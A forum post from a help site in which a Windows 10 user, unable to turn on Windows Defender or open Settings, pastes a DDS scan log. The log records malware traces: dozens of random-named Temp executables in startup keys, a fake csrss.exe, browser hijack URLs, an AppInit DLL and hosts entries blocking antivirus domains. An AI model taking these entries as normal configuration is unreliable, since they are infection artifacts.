Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Unable to enable WinDefender On and open Settings and other


  • This topic is locked This topic is locked
6 replies to this topic

#1 D3AtH

D3AtH

  • Members
  • 3 posts
  • OFFLINE
  •  

Posted 08 June 2018 - 02:46 PM

Hello all, I am using windows 10 and I have encountered a problem. I am unable to enable Windows Defender On and cannot open Settings , Search bar , Start menu , Action center and I don't know why. I have tried many methods to solve this problem but I had no luck at all. And on top of all that I tried even the sfc scan and can't run it even as an administrator, it says "Access is denied." I had run Dism scans aswell and it still didn't work. I tried Rkill and it did't do a thing.
I ran a DDS scan here is what I got in the logs:
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 11.0.17134.1  BrowserJavaVersion: 11.161.2
Run by Craciun at 22:03:04 on 2018-06-08
Microsoft Windows 10 Pro  10.0.17134.0.1252.1.1033.18.3986.355 [GMT 3:00]
.
AV: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay
C:\Windows\system32\fontdrvhost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
c:\windows\system32\svchost.exe -k rpcss -p
c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM
c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NcbService
c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
c:\windows\system32\svchost.exe -k localservice -p -s bthserv
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
c:\windows\system32\svchost.exe -k localservice -p -s BthAvctpSvc
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s TimeBrokerSvc
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s hidserv
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s EventLog
c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager
c:\windows\system32\svchost.exe -k localservice -p -s nsi
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s BTAGService
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s DeviceAssociationService
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s Dhcp
c:\windows\system32\svchost.exe -k localservice -p -s EventSystem
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s SysMain
c:\windows\system32\svchost.exe -k netsvcs -p -s Themes
C:\WINDOWS\system32\rundll32.exe
c:\windows\system32\svchost.exe -k networkservice -p -s NlaSvc
c:\windows\system32\svchost.exe -k netsvcs -p -s SENS
c:\windows\system32\svchost.exe -k localservice -p -s netprofm
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s AudioEndpointBuilder
c:\windows\system32\svchost.exe -k localservice -p -s FontCache
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
c:\windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
c:\windows\system32\svchost.exe -k networkservice -p -s Dnscache
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p
c:\windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
c:\windows\system32\svchost.exe -k netsvcs -p -s iphlpsvc
c:\windows\system32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
c:\windows\system32\svchost.exe -k networkservice -p -s LanmanWorkstation
C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
c:\windows\system32\svchost.exe -k networkservice -p -s CryptSvc
C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
C:\Windows\System32\svchost.exe -k utcsvc -p
c:\windows\system32\svchost.exe -k localservicenonetwork -p -s DPS
c:\windows\syswow64\svchost.exe -k microservicegroup -s MicroService
c:\windows\system32\svchost.exe -k localservice -p -s SstpSvc
c:\windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\WINDOWS\RtkBtManServ.exe
C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s TrkWks
c:\windows\system32\svchost.exe -k netsvcs -p -s WpnService
c:\windows\system32\svchost.exe -k localservice -p -s WdiServiceHost
c:\windows\system32\svchost.exe -k netsvcs
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s lmhosts
c:\windows\system32\svchost.exe -k localservice -p -s tzautoupdate
c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s TabletInputService
c:\windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s PcaSvc
c:\windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Windows\system32\SearchIndexer.exe
c:\windows\system32\svchost.exe -k netsvcs -p
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -p -s SSDPSRV
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s StorSvc
C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
c:\windows\system32\svchost.exe -k localservice -p -s LicenseManager
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -p -s QWAVE
C:\Windows\System32\dwm.exe
C:\Windows\System32\fontdrvhost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
c:\windows\system32\sihost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\svchost.exe -k unistacksvcgroup -s WpnUserService
c:\windows\system32\taskhostw.exe
C:\Windows\Explorer.EXE
C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPHELPER.EXE
C:\Windows\system32\ctfmon.exe
C:\Windows\system32\SettingSyncHost.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Windows\System32\rundll32.exe
C:\Users\Craciun\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Users\Craciun\AppData\Roaming\uTorrent\uTorrent.exe
C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
C:\Users\Craciun\AppData\Roaming\uTorrent\updates\3.5.3_44396\utorrentie.exe
C:\Users\Craciun\AppData\Roaming\uTorrent\updates\3.5.3_44396\utorrentie.exe
C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup
C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe
C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\CCXProcess.exe
C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\libs\node.exe
C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\backgroundTaskHost.exe
c:\windows\system32\taskhostw.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s WdiSystemHost
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\system32\AUDIODG.EXE
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -p -s upnphost
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\System32\smartscreen.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iY1JmNoT6P_LBC58xFfZfVmoWmroNmrmUx8_e4oxvuDKV9xTzbBCRgXd1mMyYXcmAdQQyyvLWU57UoofG1UzdLvJaOTe5RZu6mfibq4HA6E3-LxFj4oSu6ZB6kD9RIOjbV3B7D5mvYBN6KpUo6tpuMSJcs10XaI4YpAln9M9NA,
uLocal Page = %11%\blank.htm
uSearch Bar = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iY1JmNoT6P_LBC58xFfZfVmoWmroNmrmUx8_e4oxvuDKV9xTzbBCRgXd1mMyYXcmAdQQyyvLWU57UoocABathQHtYaRfAjwJpXRqIgaWUaVd1HXtAhJiyaJgHOJ4wq7EDZHG4Pa06A1qF3LSfTcbkeUsTXIcpzbBTXUQzjikUs,&q={searchTerms}
uSearch Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iY1JmNoT6P_LBC58xFfZfVmoWmroNmrmUx8_e4oxvuDKV9xTzbBCRgXd1mMyYXcmAdQQyyvLWU57UoocABathQHtYaRfAjwJpXRqIgaWUaVd1HXtAhJiyaJgHOJ4wq7EDZHG4Pa06A1qF3LSfTcbkeUsTXIcpzbBTXUQzjikUs,&q={searchTerms}
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_161\bin\ssv.dll
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_161\bin\jp2ssv.dll
uRun: [OneDrive] "C:\Users\Craciun\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
uRun: [uTorrent] "C:\Users\Craciun\AppData\Roaming\uTorrent\uTorrent.exe"  /MINIMIZED
uRun: [DAEMON Tools Pro Agent] "C:\Program Files\DAEMON Tools Pro\DTAgent.exe" -autorun
uRun: [9smAipOnMy.exe] C:\Program Files\Synaptics\PS1O1Z7IEGLDHYG\9smAipOnMy.exe 
uRun: [7DDHIUFMJV2EL7F] "C:\Program Files (x86)\ShutdownTime\5FZPC.exe"
uRun: [RestlessDream] "C:\Windows\rss\csrss.exe"
uRun: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
uRun: [6R71.exe] C:\Users\Craciun\AppData\Local\Temp\CDQUIA1MVU\6R71.exe 
uRun: [CloudNet] "C:\Users\Craciun\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" 31337
uRun: [OUXZ.exe] C:\Users\Craciun\AppData\Local\Temp\TGGSGCKZPL\OUXZ.exe 
uRun: [U2DF.exe] C:\Users\Craciun\AppData\Local\Temp\KE0R86LF9W\U2DF.exe 
uRun: [YUFW.exe] C:\Users\Craciun\AppData\Local\Temp\9G237R4OUT\YUFW.exe 
uRun: [X7KF.exe] C:\Users\Craciun\AppData\Local\Temp\Q4WT4U9OKD\X7KF.exe 
uRun: [J4DW.exe] C:\Users\Craciun\AppData\Local\Temp\S8U9G5VHAK\J4DW.exe 
uRun: [QC81.exe] C:\Users\Craciun\AppData\Local\Temp\WXRTGWWTMA\QC81.exe 
uRun: [LXYS.exe] C:\Users\Craciun\AppData\Local\Temp\88RDI2YFE2\LXYS.exe 
uRun: [TG0F.exe] C:\Users\Craciun\AppData\Local\Temp\TG0FRLEG66\TG0F.exe 
uRun: [U5Y0.exe] C:\Users\Craciun\AppData\Local\Temp\U5Y0DOU28Z\U5Y0.exe 
uRun: [3BMC.exe] C:\Users\Craciun\AppData\Local\Temp\SN8NAMCXNP\3BMC.exe 
uRun: [K5DU.exe] C:\Users\Craciun\AppData\Local\Temp\VAOXBKCGFX\K5DU.exe 
uRun: [FIHG.exe] C:\Users\Craciun\AppData\Local\Temp\2TA1Y9DOJW\FIHG.exe 
uRun: [YOV7.exe] C:\Users\Craciun\AppData\Local\Temp\LZOS39VX3X\YOV7.exe 
uRun: [H6Z0.exe] C:\Users\Craciun\AppData\Local\Temp\GOU608OGIL\H6Z0.exe 
uRun: [CKIC.exe] C:\Users\Craciun\AppData\Local\Temp\ZVCX6FUVQ7\CKIC.exe 
uRun: [53NL.exe] C:\Users\Craciun\AppData\Local\Temp\WF2NKP99YT\53NL.exe 
uRun: [KWWC.exe] C:\Users\Craciun\AppData\Local\Temp\98JOIXN0JH\KWWC.exe 
uRun: [QVLM.exe] C:\Users\Craciun\AppData\Local\Temp\D6E7ZCWRA6\QVLM.exe 
uRun: [QLWM.exe] C:\Users\Craciun\AppData\Local\Temp\QLWMUKQ53V\QLWM.exe 
uRun: [FCY5.exe] C:\Users\Craciun\AppData\Local\Temp\FCY5J3YAYR\FCY5.exe 
uRun: [8G3O.exe] C:\Users\Craciun\AppData\Local\Temp\8G3OPERZE7\8G3O.exe 
uRun: [MUSU.exe] C:\Users\Craciun\AppData\Local\Temp\MUSUQ6URHH\MUSU.exe 
uRun: [LCQF.exe] C:\Users\Craciun\AppData\Local\Temp\8NK0ND5Z6H\LCQF.exe 
uRun: [P5VP.exe] C:\Users\Craciun\AppData\Local\Temp\P5VP6BI7NG\P5VP.exe 
uRun: [V6OZ.exe] C:\Users\Craciun\AppData\Local\Temp\V6OZMU6NHQ\V6OZ.exe 
uRun: [JAQ3.exe] C:\Users\Craciun\AppData\Local\Temp\ZIV2N825LS\JAQ3.exe 
uRun: [HMHK.exe] C:\Users\Craciun\AppData\Local\Temp\HMHKW0J8G1\HMHK.exe 
uRun: [Z87K.exe] C:\Users\Craciun\AppData\Local\Temp\Z87KLFT34W\Z87K.exe 
uRun: [042B.exe] C:\Users\Craciun\AppData\Local\Temp\CQI82VFER8\042B.exe 
uRun: [JOBY.exe] C:\Users\Craciun\AppData\Local\Temp\JOBYT3PP9O\JOBY.exe 
uRunOnce: [Application Restart #1] C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe --aamHelperPipeName={F83A0145-CB25-44BB-9CA3-3A26F5CD4404} --appletVersion=1.0 --helperBridgeName={F83A0145-CB25-44BB-9CA3-3A26F5CD4404} --lbsInstallerWorkflowID={693A9B8D-2838-4B98-A309-B92D8425D0BB} --lbsWorkflowID={6956E04C-A02C-4924-A805-E2CCAA2C80BF} --mode=LBS --selfDelete=true --shouldLaunchACC=false --workflowId={6956E04C-A02C-4924-A805-E2CCAA2C80BF} --waitForRegistration=true /RestartByRestartManager:87B4333F-4480-47f3-B614-C9738E1092DA
uRunOnce: [Application Restart #2] C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe --appletVersion=1.0 --mode=LBS --helperBridgeName={F83A0145-CB25-44BB-9CA3-3A26F5CD4404} --lbsWorkflowID={6956E04C-A02C-4924-A805-E2CCAA2C80BF} --aamHelperPipeName="{F83A0145-CB25-44BB-9CA3-3A26F5CD4404}" --lbsInstallerWorkflowID="{693A9B8D-2838-4B98-A309-B92D8425D0BB}" --mode="repair" --selfDelete="true" --shouldLaunchACC="false" --workflowId="{6956E04C-A02C-4924-A805-E2CCAA2C80BF}" /RestartByRestartManager:0EB2D384-F827-47fe-8D2D-BBE12D3DFB4A
mRun: [Adobe Creative Cloud] "C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
mRun: [Lightshot] C:\Program Files (x86)\Skillbrains\lightshot\Lightshot.exe
mRun: [JServicesManager] C:\Program Files\SystemaRev\RevServicesX\app.exe
mPolicies-System: DSCAutomationHostEnabled = dword:2
mPolicies-System: EnableFullTrustStartupTasks = dword:2
mPolicies-System: EnableUwpStartupTasks = dword:2
mPolicies-System: SupportFullTrustStartupTasks = dword:1
mPolicies-System: SupportUwpStartupTasks = dword:1
Trusted Zone: hola.org
TCP: NameServer = 192.168.0.1
TCP: Interfaces\{0b41cb42-7f71-4fe2-a7d7-a86604cbe95a} : DHCPNameServer = 192.168.0.1
TCP: Interfaces\{bd1fecd1-e9c9-4f98-a7f1-e2b2d288d553} : DHCPNameServer = 192.168.0.1
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
AppInit_DLLs= C:\ProgramData\Subair\S--Fix.dll
SSODL: WebCheck - <orphaned>
LSA: Security Packages =  ""
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\Windows\System32\windows.storage.dll
x64-Run: [SecurityHealth] C:\Program Files (x86)\Windows Defender\MSASCuiL.exe
x64-Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-Run: [AdobeGCInvoker-1.0] "C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe"
x64-Run: [IgfxTray] "C:\Windows\System32\igfxtray.exe"
x64-Run: [HotKeysCmds] "C:\Windows\System32\hkcmd.exe"
x64-Run: [Persistence] "C:\Windows\System32\igfxpers.exe"
x64-Run: [resolve_run] C:\Program Files (x86)\Common Files\new.bat
x64-Run: [JServicesManager] C:\Program Files\SystemaRev\RevServicesX\app.exe
x64-Run: [rundll32] C:\Windows\System32\rundll32.exe "C:\Program Files\Sawmenger XP\Sawmenger XP.dll",elnXHi
x64-Run: [AdobeAAMUpdater-1.0] "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
x64-RunOnce: [OMEWPRODUCT_] "C:\Program Files\Synaptics\PS1O1Z7IEGLDHYG\RJFnT9NCyn.exe"
x64-RunOnce: [woxutvthzbd] "C:\Program Files (x86)\trs\3084091.exe" 1 3.1527140332.5b064fec69599
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-mPolicies-System: EnableFullTrustStartupTasks = dword:2
x64-mPolicies-System: EnableUwpStartupTasks = dword:2
x64-mPolicies-System: SupportFullTrustStartupTasks = dword:1
x64-mPolicies-System: SupportUwpStartupTasks = dword:1
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\System32\tbauth.dll
x64-Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\System32\tbauth.dll
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
x64-SEH: <No Name> - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\System32\mcicda64.dll
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\66.0.3359.181\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\Windows\System32\windows.storage.dll
Hosts: 127.0.0.1 gf.tools.avast.com
Hosts: 127.0.0.1 pair.ff.avast.com
Hosts: 127.0.0.1 ipm-provider.ff.avast.com
Hosts: 127.0.0.1 ipm-provider.ff.avast.com
Hosts: 127.0.0.1 ipm-provider.ff.avast.com
.
Note: multiple HOSTS entries found. Please refer to Attach.txt
.
============= SERVICES / DRIVERS ===============
.
R0 iaStorA;iaStorA;C:\Windows\System32\drivers\iaStorA.sys [2016-12-3 646408]
R0 intelpep;Intel® Power Engine Plug-in Driver;C:\Windows\System32\drivers\intelpep.sys [2018-4-12 177192]
R0 iorate;Disk I/O Rate Filter Driver;C:\Windows\System32\drivers\iorate.sys [2018-4-12 58272]
R1 afunix;afunix;C:\Windows\System32\drivers\afunix.sys [2018-4-12 39424]
R1 ahcache;Application Compatibility Cache;C:\Windows\System32\drivers\ahcache.sys [2018-4-12 254464]
R1 bam;Background Activity Moderator Driver;C:\Windows\System32\drivers\bam.sys [2018-4-12 60320]
R1 FileCrypt;FileCrypt;C:\Windows\System32\drivers\filecrypt.sys [2018-4-12 55808]
R1 GpuEnergyDrv;GPU Energy Driver;C:\Windows\System32\drivers\gpuenergydrv.sys [2018-4-12 8192]
R1 gtkrnl;gtkrn;C:\Windows\System32\drivers\gtkrnl.sys [2018-3-28 126856]
R1 HWiNFO32;HWiNFO32/64 Kernel Driver;C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [2017-5-3 27552]
R2 CldFlt;Windows Cloud Files Filter Driver;C:\Windows\System32\drivers\cldflt.sys [2018-4-12 414208]
R3 BthLEEnum;Bluetooth Low Energy Driver;C:\Windows\System32\drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys [2018-4-12 86528]
R3 CAD;Charge Arbitration Driver;C:\Windows\System32\drivers\CAD.sys [2018-4-12 60320]
R3 dtproscsibus;DAEMON Tools Pro Virtual SCSI Bus;C:\Windows\System32\drivers\dtproscsibus.sys [2017-7-6 30352]
S3 AcpiDev;ACPI Devices driver;C:\Windows\System32\drivers\AcpiDev.sys [2018-4-12 20480]
S3 ADP80XX;ADP80XX;C:\Windows\System32\drivers\adp80xx.sys [2018-4-12 1135520]
S3 applockerfltr;Smartlocker Filter Driver;C:\Windows\System32\drivers\applockerfltr.sys [2018-4-12 18432]
S3 AppvStrm;AppvStrm;C:\Windows\System32\drivers\AppVStrm.sys [2018-4-12 127384]
S3 AppvVemgr;AppvVemgr;C:\Windows\System32\drivers\AppvVemgr.sys [2018-4-12 162712]
S3 AppvVfs;AppvVfs;C:\Windows\System32\drivers\AppvVfs.sys [2018-4-12 143768]
S3 bcmfn2;bcmfn2 Service;C:\Windows\System32\drivers\bcmfn2.sys [2018-4-12 9728]
S3 bindflt;Windows Bind Filter Driver;C:\Windows\System32\drivers\bindflt.sys [2018-4-12 92056]
S3 bttflt;Microsoft Hyper-V VHDPMEM BTT Filter;C:\Windows\System32\drivers\bttflt.sys [2018-4-12 38304]
S3 buttonconverter;Service for Portable Device Control devices;C:\Windows\System32\drivers\buttonconverter.sys [2018-4-12 39936]
S3 CapImg;HID driver for CapImg touch screen;C:\Windows\System32\drivers\capimg.sys [2018-4-12 123392]
S3 cht4iscsi;cht4iscsi;C:\Windows\System32\drivers\cht4sx64.sys [2018-4-12 321432]
S3 cht4vbd;Chelsio Virtual Bus Driver;C:\Windows\System32\drivers\cht4vx64.sys [2018-4-12 1836952]
S3 dtlitescsibus;DAEMON Tools Lite Virtual SCSI Bus;C:\Windows\System32\drivers\dtlitescsibus.sys [2016-12-6 30264]
S3 genericusbfn;Generic USB Function Class;C:\Windows\System32\drivers\genericusbfn.sys [2018-4-12 20992]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\Windows\System32\drivers\hidinterrupt.sys [2018-4-12 50592]
S3 HwNClx0101;Microsoft Hardware Notifications Class Extension Driver;C:\Windows\System32\drivers\mshwnclx.sys [2018-4-12 27136]
S3 iagpio;Intel Serial IO GPIO Controller Driver;C:\Windows\System32\drivers\iagpio.sys [2018-4-12 36864]
S3 iai2c;Intel® Serial IO I2C Host Controller;C:\Windows\System32\drivers\iai2c.sys [2018-4-12 91648]
S3 iaLPSS2i_GPIO2;Intel® Serial IO GPIO Driver v2;C:\Windows\System32\drivers\iaLPSS2i_GPIO2.sys [2018-4-12 79360]
S3 iaLPSS2i_GPIO2_BXT_P;Intel® Serial IO GPIO Driver v2;C:\Windows\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys [2018-4-12 88576]
S3 iaLPSS2i_I2C;Intel® Serial IO I2C Driver v2;C:\Windows\System32\drivers\iaLPSS2i_I2C.sys [2018-4-12 171520]
S3 iaLPSS2i_I2C_BXT_P;Intel® Serial IO I2C Driver v2;C:\Windows\System32\drivers\iaLPSS2i_I2C_BXT_P.sys [2018-4-12 174592]
S3 iaLPSSi_GPIO;Intel® Serial IO GPIO Controller Driver;C:\Windows\System32\drivers\iaLPSSi_GPIO.sys [2018-4-12 38128]
S3 iaLPSSi_I2C;Intel® Serial IO I2C Controller Driver;C:\Windows\System32\drivers\iaLPSSi_I2C.sys [2018-4-12 113152]
S3 iaStorAVC;Intel Chipset SATA RAID Controller;C:\Windows\System32\drivers\iaStorAVC.sys [2018-4-12 885144]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\Windows\System32\drivers\ibbus.sys [2018-4-12 526232]
S3 IndirectKmd;Indirect Displays Kernel-Mode Driver;C:\Windows\System32\drivers\IndirectKmd.sys [2018-4-12 38912]
S3 IPT;IPT;C:\Windows\System32\drivers\ipt.sys [2018-4-12 32256]
S3 ItSas35i;ItSas35i;C:\Windows\System32\drivers\ItSas35i.sys [2018-4-12 145816]
S3 LSI_SAS2i;LSI_SAS2i;C:\Windows\System32\drivers\lsi_sas2i.sys [2018-4-12 124312]
S3 LSI_SAS3i;LSI_SAS3i;C:\Windows\System32\drivers\lsi_sas3i.sys [2018-4-12 128408]
S3 mausbhost;MA-USB Host Controller Driver;C:\Windows\System32\drivers\mausbhost.sys [2018-4-12 505240]
S3 mausbip;MA-USB IP Filter Driver;C:\Windows\System32\drivers\mausbip.sys [2018-4-12 56736]
S3 megasas2i;megasas2i;C:\Windows\System32\drivers\MegaSas2i.sys [2018-4-12 75160]
S3 megasas35i;megasas35i;C:\Windows\System32\drivers\megasas35i.sys [2018-4-12 82328]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\Windows\System32\drivers\mlx4_bus.sys [2018-4-12 842648]
S4 hvcrash;hvcrash;C:\Windows\System32\drivers\hvcrash.sys [2018-4-12 33184]
.
=============== File Associations ===============
.
FileExt: .reg: regfile=regedit.exe "%1" [UserChoice]
FileExt: .txt: txtfile=C:\Windows\System32\NOTEPAD.EXE %1 [UserChoice]
.
=============== Created Last 30 ================
.
2018-06-08 12:42:22 -------- d--h--w- C:\OneDriveTemp
2018-06-08 06:05:05 -------- d-----w- C:\Program Files\SystemaRev
2018-06-07 17:22:44 -------- d-----w- C:\Users\Craciun\AppData\Roaming\bsvctp
2018-06-04 16:53:41 -------- d-----w- C:\Users\Craciun\AppData\Roaming\schedsvc
2018-06-02 13:30:21 -------- d-----w- C:\Users\Craciun\AppData\Roaming\gsvc
2018-05-30 17:48:39 94208 ----a-w- C:\Users\Craciun\AppData\Roaming\command.dll
2018-05-30 17:48:39 623616 ----a-w- C:\Users\Craciun\AppData\Roaming\product.dll
2018-05-26 21:14:19 -------- d-----w- C:\Users\Craciun\AppData\Roaming\SystemaRev
2018-05-26 11:23:52 -------- d-----w- C:\ProgramData\Subairs
2018-05-26 11:23:42 -------- d-----w- C:\Program Files (x86)\Common Files\FixSanfind
2018-05-26 11:23:34 -------- d-----w- C:\ProgramData\Logic Cramble
2018-05-26 11:23:32 1895382 ----a-w- C:\Users\Craciun\AppData\Local\Subity.bin
2018-05-26 11:23:11 -------- d-----w- C:\Users\Craciun\AppData\Roaming\System Healer
2018-05-26 11:23:09 -------- d-----w- C:\Program Files (x86)\SystemHealer
2018-05-26 11:23:04 -------- d-----w- C:\ProgramData\Subair
2018-05-26 11:22:45 2136576 ----a-w- C:\Users\Craciun\AppData\Local\Biojob.exe
2018-05-26 11:21:51 -------- d-----w- C:\ProgramData\PrefsSecure
2018-05-26 11:21:50 278510 ----a-w- C:\Users\Craciun\AppData\Local\Statphase.bin
2018-05-26 08:53:06 -------- d-----w- C:\Users\Craciun\AppData\Roaming\SUPERAntiSpyware.com
2018-05-26 08:51:54 -------- d-----w- C:\ProgramData\SUPERAntiSpyware.com
2018-05-26 08:51:54 -------- d-----w- C:\Program Files\SUPERAntiSpyware
2018-05-25 14:40:49 -------- d-----w- C:\Users\Craciun\AppData\Local\D3DSCache
2018-05-25 14:28:05 152184 ----a-w- C:\Windows\System32\drivers\mbae64.sys
2018-05-25 04:50:42 -------- d-----w- C:\sysg
2018-05-24 23:01:29 184 ---ha-w- C:\Program Files (x86)\Common Files\new.bat
2018-05-24 08:45:45 -------- d-----w- C:\Windows.old
2018-05-24 08:37:39 -------- d-----w- C:\Windows\System32\Microsoft
